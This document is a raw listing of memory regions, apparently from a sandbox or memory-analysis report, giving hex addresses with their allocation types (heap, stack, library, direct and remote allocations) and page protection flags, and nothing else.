1F3DE127000
trusted library allocation
page read and write
DD5000
heap
page read and write
1B300000
trusted library allocation
page read and write
1F9E0CF8000
heap
page read and write
1F9E0CB8000
heap
page read and write
813000
heap
page read and write
1B6E0000
trusted library allocation
page read and write
7DF40FFC0000
trusted library allocation
page execute and read and write
1B6E0000
trusted library allocation
page read and write
3C03123000
stack
page read and write
2E19000
trusted library allocation
page read and write
1F9E0CE0000
heap
page read and write
1C080000
trusted library allocation
page read and write
28D0000
trusted library allocation
page read and write
7FFB4B460000
trusted library allocation
page execute and read and write
1BDC47E0000
heap
page read and write
69F000
unkown
page read and write
1620000
heap
page read and write
1C575000
unkown
page read and write
1F3F4E91000
heap
page read and write
1BDD0000
trusted library allocation
page read and write
1BDD4C10000
trusted library allocation
page read and write
2403AB34000
heap
page read and write
1B440000
trusted library allocation
page read and write
DEB000
heap
page read and write
BF0837E000
stack
page read and write
7FFBAA4AD000
unkown
page readonly
1B6E3000
trusted library allocation
page read and write
1C1B0000
trusted library allocation
page read and write
1C510000
trusted library allocation
page read and write
7FFB4B3FA000
trusted library allocation
page read and write
1F9E0503000
heap
page read and write
1F3DACBA000
heap
page read and write
1F9E0CD0000
heap
page read and write
BF08678000
stack
page read and write
7FFB4B5B0000
trusted library allocation
page read and write
A7E1AFF000
stack
page read and write
22130828000
heap
page read and write
1F9E0CC8000
heap
page read and write
1BE70000
trusted library allocation
page read and write
1B6E3000
trusted library allocation
page read and write
1B6E3000
trusted library allocation
page read and write
1B6E0000
trusted library allocation
page read and write
1B310000
trusted library allocation
page read and write
1F3DAE10000
heap
page read and write
7FFB4B480000
trusted library allocation
page read and write
1C1F0000
trusted library allocation
page read and write
1F9E0E8A000
heap
page read and write
1B220000
heap
page execute and read and write
7FFB4B244000
trusted library allocation
page read and write
1BA12000
direct allocation
page execute and read and write
1F9E0CD0000
heap
page read and write
1F9E0357000
heap
page read and write
24023D96000
trusted library allocation
page read and write
1B420000
trusted library allocation
page read and write
1F9E0D00000
heap
page read and write
1F9E0CC8000
heap
page read and write
7FFB4B5A8000
trusted library allocation
page read and write
1F9E042A000
heap
page read and write
2E1C000
trusted library allocation
page read and write
DCD000
heap
page read and write
24022070000
trusted library allocation
page read and write
1B530000
heap
page read and write
1C2E0000
unkown
page read and write
1C2A0000
trusted library allocation
page read and write
2403AE00000
heap
page read and write
1B6E3000
trusted library allocation
page read and write
1BDC6267000
trusted library allocation
page read and write
24D913B0000
heap
page read and write
1B6F0000
trusted library allocation
page read and write
1F9E0CB0000
heap
page read and write
1F9E042A000
heap
page read and write
1F9E0CB8000
heap
page read and write
63FC000
stack
page read and write
1F9E0CC8000
heap
page read and write
1B6E0000
trusted library allocation
page read and write
1F9E042D000
heap
page read and write
1F9DF9D0000
direct allocation
page read and write
1B86F000
heap
page read and write
3C039FE000
stack
page read and write
1C490000
trusted library allocation
page read and write
1BDC2D80000
heap
page read and write
1B7F1000
heap
page read and write
1C0A0000
trusted library allocation
page read and write
1C450000
trusted library allocation
page read and write
1F9E0D00000
heap
page read and write
1B3B0000
trusted library allocation
page read and write
1F9E0CC8000
heap
page read and write
53A3000
heap
page read and write
1F9DE0AE000
heap
page read and write
2A4ACE08000
heap
page read and write
2212F074000
heap
page read and write
1F9E0E8A000
heap
page read and write
24020590000
heap
page read and write
1C000000
unkown
page read and write
1C180000
trusted library allocation
page read and write
1C520000
trusted library allocation
page read and write
1B6E0000
trusted library allocation
page read and write
1C0A0000
trusted library allocation
page read and write
F17627E000
stack
page read and write
1C230000
trusted library allocation
page read and write
1B6E3000
trusted library allocation
page read and write
1B700000
trusted library allocation
page read and write
1F9E0CB0000
heap
page read and write
1BFE0000
trusted library allocation
page read and write
1F3F5080000
heap
page read and write
2A4ACCF0000
heap
page read and write
1BE70000
trusted library allocation
page read and write
1BE00000
heap
page read and write
1BDA0000
trusted library allocation
page read and write
1F9E0CC8000
heap
page read and write
1B5AD000
heap
page read and write
767000
heap
page read and write
1F9E0CB0000
heap
page read and write
7FFB4B457000
trusted library allocation
page read and write
7FFB4B5E0000
trusted library allocation
page read and write
7FFB4B25D000
trusted library allocation
page execute and read and write
1BF30000
trusted library allocation
page read and write
1B6E3000
trusted library allocation
page read and write
20F0000
heap
page read and write
1BE51000
trusted library allocation
page read and write
7FFB4B64C000
trusted library allocation
page read and write
1F9E0E8A000
heap
page read and write
1BE52000
trusted library allocation
page read and write
1B3AE000
stack
page read and write
1B700000
trusted library allocation
page read and write
1C0A0000
trusted library allocation
page read and write
1F3DAC48000
heap
page read and write
1BDC4660000
heap
page read and write
7FFB4B663000
trusted library allocation
page read and write
2403A8B0000
heap
page read and write
1B303000
trusted library allocation
page read and write
538A000
heap
page read and write
24023520000
trusted library allocation
page read and write
2A4ACBAC000
unkown
page read and write
872B5FE000
stack
page read and write
1F3EC7F1000
trusted library allocation
page read and write
1B460000
trusted library allocation
page read and write
872B57A000
stack
page read and write
2600000
heap
page read and write
1F9E01A9000
heap
page read and write
872B172000
stack
page read and write
1F9E0D30000
heap
page read and write
7FFB4B710000
trusted library allocation
page read and write
1B6E3000
trusted library allocation
page read and write
14B0000
heap
page read and write
1BD30000
trusted library allocation
page read and write
1F9E0CB8000
heap
page read and write
1B313000
trusted library allocation
page read and write
2403ACB0000
heap
page read and write
1BE50000
trusted library allocation
page read and write
1F3DAD50000
heap
page read and write
231A86D0000
unkown
page read and write
1F3F4F54000
heap
page read and write
1F9E0E8A000
heap
page read and write
7CB000
heap
page read and write
1B6E0000
trusted library allocation
page read and write
2750000
trusted library allocation
page read and write
1BDC6127000
trusted library allocation
page read and write
1AA419CA000
heap
page read and write
1B6E3000
trusted library allocation
page read and write
7FFB4B360000
trusted library allocation
page execute and read and write
7FFB4B24D000
trusted library allocation
page execute and read and write
1BE50000
trusted library allocation
page read and write
1B340000
trusted library allocation
page read and write
1F9E0D00000
heap
page read and write
7FFB4B5A0000
trusted library allocation
page read and write
1B534000
trusted library allocation
page read and write
1F9E0CC8000
heap
page read and write
1F9E0CB0000
heap
page read and write
54BF000
heap
page read and write
537C000
heap
page read and write
1F9E0D30000
heap
page read and write
1F9E0E8A000
heap
page read and write
2243000
heap
page read and write
759000
heap
page read and write
1C020000
trusted library allocation
page read and write
240322A1000
trusted library allocation
page read and write
7DF4252B0000
trusted library allocation
page execute and read and write
1F9E0CD0000
heap
page read and write
813000
heap
page read and write
1B6E3000
trusted library allocation
page read and write
231A872C000
unkown
page read and write
22130B29000
heap
page read and write
1F9E0CC8000
heap
page read and write
1C040000
trusted library allocation
page read and write
1B480000
trusted library allocation
page read and write
1BFF0000
trusted library allocation
page read and write
1B460000
heap
page read and write
7FFB4B2BC000
trusted library allocation
page execute and read and write
240222A1000
trusted library allocation
page read and write
1B7F0000
heap
page read and write
1AA41978000
heap
page read and write
1F9E0CD0000
heap
page read and write
7FFB4B380000
trusted library allocation
page execute and read and write
7FFB4B660000
trusted library allocation
page execute and read and write
DF7000
heap
page read and write
1C210000
trusted library allocation
page read and write
2212EE91000
heap
page read and write
1B6E0000
trusted library allocation
page read and write
7FFB4B520000
trusted library allocation
page read and write
7FFB4B480000
trusted library allocation
page read and write
1F3F4C70000
heap
page execute and read and write
1B700000
trusted library allocation
page read and write
1F9E0617000
heap
page read and write
1F9E043B000
heap
page read and write
DE0000
heap
page read and write
1BDD4D48000
trusted library allocation
page read and write
1B6E8000
trusted library allocation
page read and write
1C0A0000
trusted library allocation
page read and write
1BDC611A000
trusted library allocation
page read and write
96C416C000
stack
page read and write
231A872F000
unkown
page execute and read and write
1B6E3000
trusted library allocation
page read and write
7FFB4B430000
trusted library allocation
page execute and read and write
1F9E0CE8000
heap
page read and write
1B6F3000
trusted library allocation
page read and write
3C0357F000
stack
page read and write
1B503000
heap
page read and write
7FFB4B550000
trusted library allocation
page read and write
1F9E0CD0000
heap
page read and write
1F9E0CE0000
heap
page read and write
1F9E0E8A000
heap
page read and write
1BE4B000
stack
page read and write
1F9E0416000
heap
page read and write
1F9DE0B1000
heap
page read and write
7FFB4B5F0000
trusted library allocation
page read and write
5446000
heap
page read and write
1F9DE0A8000
heap
page read and write
28C0000
trusted library allocation
page read and write
7FFB4B2CC000
trusted library allocation
page execute and read and write
1C100000
trusted library allocation
page read and write
1F9E0CA0000
heap
page read and write
7FFB4B29D000
trusted library allocation
page execute and read and write
1C3B0000
trusted library allocation
page read and write
1B317000
trusted library allocation
page read and write
3C0377E000
stack
page read and write
2730000
trusted library allocation
page read and write
1F9E0D30000
heap
page read and write
1B300000
trusted library allocation
page read and write
1F9E0D40000
heap
page read and write
7FFB4B366000
trusted library allocation
page execute and read and write
1BE70000
trusted library allocation
page read and write
7FFB4B2F0000
trusted library allocation
page read and write
3C031AE000
stack
page read and write
8AC2DFD000
stack
page read and write
2740000
trusted library allocation
page read and write
1F9E0E8A000
heap
page read and write
DEB000
heap
page read and write
8A9000
unkown
page readonly
1F9E0E8A000
heap
page read and write
1F9E0CB8000
heap
page read and write
1B3B0000
trusted library allocation
page read and write
1AA41970000
heap
page read and write
1C470000
trusted library allocation
page read and write
7FFB4B42A000
trusted library allocation
page read and write
1AA41FBF000
heap
page read and write
2216000
heap
page read and write
1F9E0CD0000
heap
page read and write
DD5000
heap
page read and write
1AF85000
heap
page read and write
1B6E3000
trusted library allocation
page read and write
1F9DE087000
heap
page read and write
1BDC6123000
trusted library allocation
page read and write
1B6E0000
trusted library allocation
page read and write
1BE40000
trusted library allocation
page read and write
1AA4198B000
heap
page read and write
1C490000
trusted library allocation
page read and write
DD0000
heap
page read and write
DC2000
heap
page read and write
1C440000
trusted library allocation
page read and write
24020690000
heap
page read and write
1AA401C8000
heap
page read and write
1F9E0CF8000
heap
page read and write
1BE60000
trusted library allocation
page read and write
1F9E0CE0000
heap
page read and write
1B313000
trusted library allocation
page read and write
1C46E000
trusted library allocation
page read and write
1F9E0CD0000
heap
page read and write
1C290000
trusted library allocation
page read and write
872B6FD000
stack
page read and write
1F3ECAAE000
trusted library allocation
page read and write
1AA3FFE6000
heap
page read and write
1C4F0000
trusted library allocation
page read and write
65FB000
stack
page read and write
1F9E0CE8000
heap
page read and write
1F9E0D00000
heap
page read and write
24023CAC000
trusted library allocation
page read and write
1F3ECAA7000
trusted library allocation
page read and write
1B300000
trusted library allocation
page read and write
1B330000
unkown
page read and write
1F9E0CB8000
heap
page read and write
1BFD0000
trusted library allocation
page read and write
1BFE0000
trusted library allocation
page read and write
1B6E3000
trusted library allocation
page read and write
1F9E0CD0000
heap
page read and write
1F9E040C000
heap
page read and write
1B3B0000
trusted library allocation
page read and write
1F9E0D10000
heap
page read and write
240322D1000
trusted library allocation
page read and write
1F9E0423000
heap
page read and write
7FFB4B270000
trusted library allocation
page read and write
1F9E0CB0000
heap
page read and write
24022290000
heap
page read and write
7FFB4B520000
trusted library allocation
page read and write
1F3F4EF0000
heap
page read and write
7FFB4B4C0000
trusted library allocation
page read and write
1F9E0E8A000
heap
page read and write
1F9E0CE8000
heap
page read and write
7FF63D2DB000
unkown
page read and write
1F9E0470000
unkown
page read and write
1BEF0000
trusted library allocation
page read and write
1BDAB000
trusted library allocation
page read and write
1F9E0CB8000
heap
page read and write
1F3DAE14000
heap
page read and write
1C400000
trusted library allocation
page read and write
7FFB4B470000
trusted library allocation
page read and write
1F9E0CE8000
heap
page read and write
1AA3FDAF000
unkown
page execute and read and write
1BDC2D50000
heap
page read and write
1BE60000
trusted library allocation
page read and write
1F3F4DB0000
heap
page read and write
1C380000
trusted library allocation
page read and write
28E0000
trusted library allocation
page read and write
2890000
trusted library allocation
page read and write
BF083FE000
stack
page read and write
1F9E0D78000
heap
page read and write
1F9E0CC8000
heap
page read and write
BF08A7B000
stack
page read and write
1B720000
trusted library allocation
page read and write
2400000
heap
page read and write
1F3DDAEA000
trusted library allocation
page read and write
7FFB4B573000
trusted library allocation
page read and write
1F9E0CE0000
heap
page read and write
400000
unkown
page readonly
1C2C0000
trusted library allocation
page read and write
1B6E0000
trusted library allocation
page read and write
1F9E0E8A000
heap
page read and write
1B7F8000
heap
page read and write
1F9E01A9000
heap
page read and write
7FFB4B430000
trusted library allocation
page read and write
DE9000
heap
page read and write
1F9E0CD0000
heap
page read and write
1AA41E40000
heap
page read and write
DCD000
heap
page read and write
1F3DAE00000
heap
page execute and read and write
7FFB4B440000
trusted library allocation
page execute and read and write
1F9E0E8A000
heap
page read and write
1F9E0D10000
heap
page read and write
1F9DE096000
heap
page read and write
5457000
heap
page read and write
2A4ACB51000
unkown
page execute read
1BDDD01B000
heap
page read and write
1F9E0CC8000
heap
page read and write
1BE70000
trusted library allocation
page read and write
1AA41F7E000
heap
page read and write
1F9E0CD0000
heap
page read and write
1F9DE0BE000
heap
page read and write
1F9E0E8A000
heap
page read and write
1BFE0000
trusted library allocation
page read and write
7FFB4B3E2000
trusted library allocation
page read and write
54CB000
heap
page read and write
1F9E0CC8000
heap
page read and write
1AF85000
heap
page read and write
1C240000
trusted library allocation
page read and write
872C60C000
stack
page read and write
1C3D0000
trusted library allocation
page read and write
1F9E0E8A000
heap
page read and write
D82000
heap
page read and write
1F9E0D10000
heap
page read and write
1AA41F50000
heap
page read and write
1F9E0CE8000
heap
page read and write
1B6E3000
trusted library allocation
page read and write
1BDC47E5000
heap
page read and write
1F9E0D00000
heap
page read and write
28C0000
trusted library allocation
page read and write
DC0000
trusted library section
page read and write
1B6E0000
trusted library allocation
page read and write
3C03979000
stack
page read and write
1B6E3000
trusted library allocation
page read and write
1B510000
trusted library allocation
page read and write
1F9E0D58000
heap
page read and write
26DE000
stack
page read and write
1ACFD000
stack
page read and write
700000
heap
page read and write
28C0000
trusted library allocation
page read and write
24D91290000
remote allocation
page execute and read and write
1F9E0D40000
heap
page read and write
2B80000
trusted library allocation
page read and write
2403AE3C000
heap
page read and write
1F9E0CC8000
heap
page read and write
1F9E0CB0000
heap
page read and write
54DD000
heap
page read and write
1BF20000
trusted library allocation
page read and write
CF0000
heap
page read and write
1F9E0D00000
heap
page read and write
544A000
heap
page read and write
7FFB4B260000
trusted library allocation
page read and write
1C000000
unkown
page read and write
54E8000
heap
page read and write
7FFB4B590000
trusted library allocation
page read and write
1F9E0CD0000
heap
page read and write
1F9E0CC6000
heap
page read and write
1F9E0CB0000
heap
page read and write
1F3F4BFB000
heap
page read and write
1C0A0000
trusted library allocation
page read and write
1F9E0E8A000
heap
page read and write
2403A8A0000
heap
page execute and read and write
1F9DE0AE000
heap
page read and write
1BDC6251000
trusted library allocation
page read and write
1BDDCE25000
heap
page read and write
1F9E0CF8000
heap
page read and write
1B6E3000
trusted library allocation
page read and write
1B4F0000
trusted library allocation
page read and write
1625000
heap
page read and write
1AF85000
heap
page read and write
8AC29FB000
stack
page read and write
1C3A0000
trusted library allocation
page read and write
1F9E0CD0000
heap
page read and write
1F9E0D28000
heap
page read and write
1F9E0CF8000
heap
page read and write
C70000
heap
page read and write
1AA419CB000
heap
page read and write
1B3B3000
trusted library allocation
page read and write
12908000
trusted library allocation
page read and write
884000
unkown
page read and write
127B000
stack
page read and write
1F9E0CF8000
heap
page read and write
1BDDCE79000
heap
page read and write
1F9E0CF8000
heap
page read and write
BF07FDE000
stack
page read and write
1BDB0000
trusted library allocation
page read and write
1F3DAD00000
trusted library allocation
page read and write
7FFB4B580000
trusted library allocation
page read and write
1F9DE0BF000
heap
page read and write
38E2000
stack
page read and write
54D4000
heap
page read and write
1F9E0CD0000
heap
page read and write
1B6E0000
trusted library allocation
page read and write
1AF38000
heap
page read and write
7FFB4B424000
trusted library allocation
page read and write
1F9E0CC8000
heap
page read and write
1F9DE0A8000
heap
page read and write
2214000
heap
page read and write
7FFB4B4C0000
trusted library allocation
page read and write
1B6E3000
trusted library allocation
page read and write
720000
heap
page readonly
2A4ACBD0000
heap
page read and write
21F0000
heap
page read and write
24D914F0000
heap
page read and write
7FFB4B284000
trusted library allocation
page read and write
BF0877A000
stack
page read and write
1AA3FF40000
unkown
page read and write
1F9E0CB0000
heap
page read and write
7FFB4B430000
trusted library allocation
page read and write
1BDA0000
trusted library allocation
page read and write
DCF000
heap
page read and write
7FFB4B683000
trusted library allocation
page read and write
1AA3FED0000
heap
page read and write
28D0000
trusted library allocation
page read and write
DEB000
heap
page read and write
53BF000
heap
page read and write
1C350000
trusted library allocation
page read and write
1B6E0000
trusted library allocation
page read and write
2760000
trusted library allocation
page read and write
22130923000
heap
page read and write
899000
unkown
page write copy
3C03A7E000
stack
page read and write
1C500000
trusted library allocation
page read and write
1F9E0E8A000
heap
page read and write
540B000
heap
page read and write
1BE90000
trusted library allocation
page read and write
1F9E0CD0000
heap
page read and write
1F9E0428000
heap
page read and write
1BDDCDDC000
heap
page read and write
291E000
trusted library allocation
page read and write
1B16D000
stack
page read and write
1C370000
trusted library allocation
page read and write
22130833000
heap
page read and write
1BD90000
trusted library allocation
page read and write
7FFB4B356000
trusted library allocation
page execute and read and write
1BE67000
trusted library allocation
page read and write
7FFB4B274000
trusted library allocation
page read and write
1BE50000
trusted library allocation
page read and write
1F9E0423000
heap
page read and write
53F3000
heap
page read and write
1B6E0000
trusted library allocation
page read and write
1F3DDA45000
trusted library allocation
page read and write
1AA3FFCB000
heap
page read and write
24022000000
trusted library allocation
page read and write
24020980000
heap
page read and write
7FFB4B4E0000
trusted library allocation
page read and write
1BF80000
trusted library allocation
page read and write
1BDD0000
trusted library allocation
page read and write
1F9E0E8A000
heap
page read and write
1AA3FFCB000
heap
page read and write
1C380000
trusted library allocation
page read and write
1B560000
trusted library allocation
page read and write
1BE80000
trusted library allocation
page read and write
1C1F0000
unkown
page read and write
1F9E0CB0000
heap
page read and write
1AA3FF10000
unkown
page read and write
1B4E0000
trusted library allocation
page read and write
1B6E3000
trusted library allocation
page read and write
1B6E0000
trusted library allocation
page read and write
7FFB4B4E0000
trusted library allocation
page read and write
7FFBAA4A9000
unkown
page read and write
1B317000
trusted library allocation
page read and write
1F9E0CC8000
heap
page read and write
DC1000
heap
page read and write
1C270000
trusted library allocation
page read and write
1F3ECAAC000
trusted library allocation
page read and write
1F9E0CB8000
heap
page read and write
12B19000
trusted library allocation
page read and write
1BE50000
trusted library allocation
page read and write
1C4F0000
trusted library allocation
page read and write
2650000
trusted library allocation
page read and write
1B6E0000
trusted library allocation
page read and write
2403AB4E000
heap
page read and write
1F9E040C000
heap
page read and write
1F9E0CE0000
heap
page read and write
5382000
heap
page read and write
1120000
heap
page read and write
1F9E0D18000
heap
page read and write
1F9E0CE0000
heap
page read and write
1C140000
trusted library allocation
page read and write
1B390000
trusted library allocation
page read and write
1B6E0000
trusted library allocation
page read and write
12B11000
trusted library allocation
page read and write
1B5BD000
heap
page read and write
1BE50000
trusted library allocation
page read and write
3C036FE000
stack
page read and write
1F3DD99F000
trusted library allocation
page read and write
1BE57000
trusted library allocation
page read and write
1F9E034D000
heap
page read and write
1F9E03FC000
heap
page read and write
7FFB4B2DC000
trusted library allocation
page execute and read and write
2403AB42000
heap
page read and write
2403230C000
trusted library allocation
page read and write
1B6E3000
trusted library allocation
page read and write
7FF63D2DC000
unkown
page readonly
2901000
trusted library allocation
page read and write
1BE50000
trusted library allocation
page read and write
1F9E0C91000
heap
page read and write
1F9E0CB0000
heap
page read and write
1B6F0000
trusted library allocation
page read and write
1B56C000
heap
page read and write
1BEA0000
trusted library allocation
page read and write
1F9DE0AE000
heap
page read and write
7DF4252C0000
trusted library allocation
page execute and read and write
54D7000
heap
page read and write
1F9E0E8A000
heap
page read and write
240230D9000
trusted library allocation
page read and write
705000
heap
page read and write
541C000
heap
page read and write
1F9E0CE8000
heap
page read and write
7FFB4B273000
trusted library allocation
page read and write
7DF46BA70000
trusted library allocation
page execute and read and write
1BE50000
trusted library allocation
page read and write
7FFB4B25B000
trusted library allocation
page read and write
1F9E0CD0000
heap
page read and write
1B307000
trusted library allocation
page read and write
1F9E0D00000
heap
page read and write
1C420000
trusted library allocation
page read and write
1F9E0CB8000
heap
page read and write
1F9E0E8A000
heap
page read and write
1BDDC000
trusted library allocation
page read and write
7FFB4B680000
trusted library allocation
page read and write
1F9E0D00000
heap
page read and write
1B730000
trusted library allocation
page read and write
1B6E0000
trusted library allocation
page read and write
7DF43B4E1000
unkown
page execute read
1AA3FF20000
direct allocation
page execute and read and write
1AB40000
trusted library allocation
page read and write
1F9E06CF000
heap
page read and write
1B6E0000
trusted library allocation
page read and write
1C0B4000
unkown
page read and write
1F9E0D30000
heap
page read and write
1BFE0000
trusted library allocation
page read and write
1B720000
trusted library allocation
page read and write
1AA3FFEC000
heap
page read and write
1B45B000
stack
page read and write
1B6E3000
trusted library allocation
page read and write
1BE7A000
trusted library allocation
page read and write
1AA41A01000
heap
page read and write
1F9E0E8A000
heap
page read and write
1B6A0000
trusted library allocation
page read and write
8AC29F4000
stack
page read and write
1BE70000
trusted library allocation
page read and write
1F9E0CB8000
heap
page read and write
1F9E0CD0000
heap
page read and write
7FFB4B6A0000
trusted library allocation
page execute and read and write
7FFB4B292000
trusted library allocation
page read and write
1F9E0D18000
heap
page read and write
1C3C0000
trusted library allocation
page read and write
1BE50000
trusted library allocation
page read and write
28C0000
trusted library allocation
page read and write
1B6E3000
trusted library allocation
page read and write
1B6E3000
trusted library allocation
page read and write
231A89E0000
heap
page readonly
1BE60000
trusted library allocation
page read and write
1B6E0000
trusted library allocation
page read and write
1C390000
trusted library allocation
page read and write
1AA41980000
heap
page read and write
1F3EC82E000
trusted library allocation
page read and write
1F9E0D28000
heap
page read and write
DD0000
heap
page read and write
1C420000
trusted library allocation
page read and write
1B330000
trusted library allocation
page read and write
1F9E042D000
heap
page read and write
7FF7F085D000
direct allocation
page execute and read and write
1C280000
trusted library allocation
page read and write
1BE30000
trusted library allocation
page read and write
1F9E0D23000
heap
page read and write
1F9E0D00000
heap
page read and write
1F9E0CC8000
heap
page read and write
1F9E0D18000
heap
page read and write
1C340000
trusted library allocation
page read and write
7FFB4B320000
trusted library allocation
page execute and read and write
1F9DF940000
direct allocation
page read and write
1AA41A39000
heap
page read and write
1C130000
trusted library allocation
page read and write
1F9E0E8A000
heap
page read and write
1F3DAA60000
heap
page read and write
DD0000
heap
page read and write
1C0E0000
trusted library allocation
page read and write
1B6E0000
trusted library allocation
page read and write
1C250000
trusted library allocation
page read and write
28C1000
direct allocation
page execute and read and write
1BE93000
trusted library allocation
page read and write
7FFB4B480000
trusted library allocation
page read and write
1F9E0CB8000
heap
page read and write
1F9E0CA0000
heap
page read and write
1B740000
trusted library allocation
page read and write
7FFB4B690000
trusted library allocation
page read and write
1C12A000
stack
page read and write
1B63C000
heap
page read and write
1F9E0CE0000
heap
page read and write
1090000
trusted library section
page read and write
2770000
trusted library allocation
page read and write
1F9E0423000
heap
page read and write
1AA41FBF000
heap
page read and write
1BFE0000
trusted library allocation
page read and write
1F3DD523000
trusted library allocation
page read and write
1AF45000
heap
page read and write
7FFB4B500000
trusted library allocation
page read and write
7FFB4B590000
trusted library allocation
page read and write
2AFD000
stack
page read and write
24021FE0000
trusted library allocation
page read and write
1F9E0CF8000
heap
page read and write
53B8000
heap
page read and write
1BDC2E0C000
heap
page read and write
1F9E0D00000
heap
page read and write
2FE0000
heap
page read and write
96C45FC000
stack
page read and write
1C0A3000
trusted library allocation
page read and write
1F9E0351000
heap
page read and write
7FFB4B400000
trusted library allocation
page execute and read and write
2403AB8E000
heap
page read and write
1B6E0000
trusted library allocation
page read and write
1B470000
trusted library allocation
page read and write
1F9E0347000
heap
page read and write
1AA3FF20000
direct allocation
page execute and read and write
1BE50000
trusted library allocation
page read and write
1F3F4F20000
heap
page read and write
1B6E3000
trusted library allocation
page read and write
1BDC3030000
heap
page read and write
1BE57000
trusted library allocation
page read and write
7DF43B4F4000
unkown
page read and write
1C480000
trusted library allocation
page read and write
7FFB4B410000
trusted library allocation
page read and write
1B6B0000
trusted library allocation
page read and write
1BE50000
trusted library allocation
page read and write
1F9E0CD0000
heap
page read and write
1C3E0000
trusted library allocation
page read and write
1BE20000
trusted library allocation
page read and write
1F3DD527000
trusted library allocation
page read and write
1B190000
trusted library allocation
page read and write
1B180000
trusted library allocation
page read and write
1B310000
trusted library allocation
page read and write
1F9E0D00000
heap
page read and write
7FFB4B420000
trusted library allocation
page read and write
240220A0000
heap
page read and write
1B6E0000
trusted library allocation
page read and write
7FFB4B2FC000
trusted library allocation
page execute and read and write
7FFB4B4C0000
trusted library allocation
page read and write
22130921000
heap
page read and write
1BD40000
trusted library allocation
page read and write
1F9E0D28000
heap
page read and write
24D912B0000
heap
page read and write
2212ED40000
heap
page read and write
1C4B4000
trusted library allocation
page read and write
2B6A000
trusted library allocation
page read and write
7FF7F084D000
direct allocation
page execute and read and write
1BE86000
trusted library allocation
page read and write
1F3DAC46000
heap
page read and write
7FFBCB700000
direct allocation
page execute and read and write
1F9E06CF000
heap
page read and write
1BDC4710000
trusted library allocation
page read and write
1F9E0CA0000
heap
page read and write
1F9E0CD0000
heap
page read and write
1F9E0CC8000
heap
page read and write
1F9E0E8A000
heap
page read and write
1F9E0D10000
heap
page read and write
1F9E0CD0000
heap
page read and write
1BE50000
trusted library allocation
page read and write
240322C1000
trusted library allocation
page read and write
7FFB4B599000
trusted library allocation
page read and write
1F3DC7B0000
heap
page read and write
89D000
unkown
page write copy
206F000
stack
page read and write
1BDF0000
trusted library allocation
page read and write
24020701000
heap
page read and write
1B6E3000
trusted library allocation
page read and write
96C457C000
stack
page read and write
1B430000
heap
page read and write
1F9E0358000
heap
page read and write
1B6E0000
trusted library allocation
page read and write
1C3E0000
trusted library allocation
page read and write
1F9E0CB8000
heap
page read and write
1F9E0D00000
heap
page read and write
240206FD000
heap
page read and write
1C480000
trusted library allocation
page read and write
1F9E05EB000
unkown
page read and write
1BDC2E80000
heap
page read and write
1BDC5C8C000
trusted library allocation
page read and write
1B3B0000
trusted library allocation
page read and write
1C0A0000
trusted library allocation
page read and write
240221D0000
heap
page execute and read and write
3C0474B000
stack
page read and write
1C3F0000
trusted library allocation
page read and write
1B6E3000
trusted library allocation
page read and write
1F9E0E8A000
heap
page read and write
1F9E082C000
heap
page read and write
28D0000
trusted library allocation
page read and write
813000
heap
page read and write
1F9E0CF8000
heap
page read and write
1BE40000
trusted library allocation
page read and write
1B6E0000
trusted library allocation
page read and write
1BE60000
trusted library allocation
page read and write
24023E1A000
trusted library allocation
page read and write
1BDC47A7000
heap
page execute and read and write
7FFB4B430000
trusted library allocation
page execute and read and write
1B6E0000
trusted library allocation
page read and write
1B300000
trusted library allocation
page read and write
1F9E0E8A000
heap
page read and write
1F9E0CB8000
heap
page read and write
E41000
heap
page read and write
1F9E0CB8000
heap
page read and write
1160000
heap
page read and write
1F9E0CE8000
heap
page read and write
1F9E0CD0000
heap
page read and write
212F000
heap
page read and write
7FFB4B550000
trusted library allocation
page read and write
7FFB4B242000
trusted library allocation
page read and write
7DF43B4E0000
unkown
page read and write
1C447000
trusted library allocation
page read and write
7FFB4B25B000
trusted library allocation
page read and write
1BEC0000
trusted library allocation
page read and write
7FFB4B5B0000
trusted library allocation
page read and write
1BE60000
trusted library allocation
page read and write
1AA3FF5C000
unkown
page read and write
1F9E0CF9000
heap
page read and write
1B4D8000
heap
page read and write
BF08273000
stack
page read and write
54DA000
heap
page read and write
1B6E3000
trusted library allocation
page read and write
1B310000
remote allocation
page read and write
1B6E0000
trusted library allocation
page read and write
1BE10000
trusted library allocation
page read and write
1F9E0D30000
heap
page read and write
7FFB4B570000
trusted library allocation
page read and write
7FFB4B546000
trusted library allocation
page read and write
1BD80000
trusted library allocation
page read and write
1F3DAC1F000
heap
page read and write
1B6E0000
trusted library allocation
page read and write
1BFE0000
trusted library allocation
page read and write
1F9E0CD0000
heap
page read and write
872B939000
stack
page read and write
1F9E0CB0000
heap
page read and write
1F9E0411000
heap
page read and write
872C50E000
stack
page read and write
1B6F0000
trusted library allocation
page read and write
1C0A0000
trusted library allocation
page read and write
1F9E041A000
heap
page read and write
22130820000
heap
page read and write
1BDC2E71000
heap
page read and write
1F9E0CC8000
heap
page read and write
7FFB4B240000
trusted library allocation
page read and write
2212EF68000
heap
page read and write
1F9E0416000
heap
page read and write
1F3DE32F000
trusted library allocation
page read and write
1F9E0D18000
heap
page read and write
1BE7F000
trusted library allocation
page read and write
1F9E0E8A000
heap
page read and write
1F3F4B41000
heap
page read and write
1F9E0CF8000
heap
page read and write
1B6E0000
trusted library allocation
page read and write
541E000
heap
page read and write
1C0A0000
trusted library allocation
page read and write
1F3DACC0000
trusted library section
page read and write
1B3A0000
trusted library allocation
page read and write
1AA3FEB0000
heap
page read and write
240206C0000
heap
page read and write
1BDD4A61000
trusted library allocation
page read and write
7FFB4B5D0000
trusted library allocation
page read and write
2A4ACDB7000
heap
page read and write
1F9E0330000
heap
page read and write
1340000
heap
page read and write
1C3A0000
trusted library allocation
page read and write
2403A9B8000
heap
page read and write
1F9E01B0000
heap
page read and write
1BE50000
trusted library allocation
page read and write
1F9E0E8A000
heap
page read and write
1C000000
unkown
page read and write
1F9E0358000
heap
page read and write
1C3F0000
trusted library allocation
page read and write
24022220000
trusted library allocation
page read and write
7FFB4B2F6000
trusted library allocation
page read and write
1BE50000
trusted library allocation
page read and write
1BE90000
trusted library allocation
page read and write
1B6E0000
trusted library allocation
page read and write
5395000
heap
page read and write
1F3DE2AC000
trusted library allocation
page read and write
1AA41AF0000
heap
page read and write
296F000
heap
page read and write
2403A711000
heap
page read and write
1C1E0000
trusted library allocation
page read and write
7FFB4B3F1000
trusted library allocation
page read and write
1BE50000
trusted library allocation
page read and write
3C046CD000
stack
page read and write
1F9E0234000
heap
page read and write
1BE50000
trusted library allocation
page read and write
872B839000
stack
page read and write
5411000
heap
page read and write
1F9DE087000
heap
page read and write
1F9E0CD0000
heap
page read and write
1B6E3000
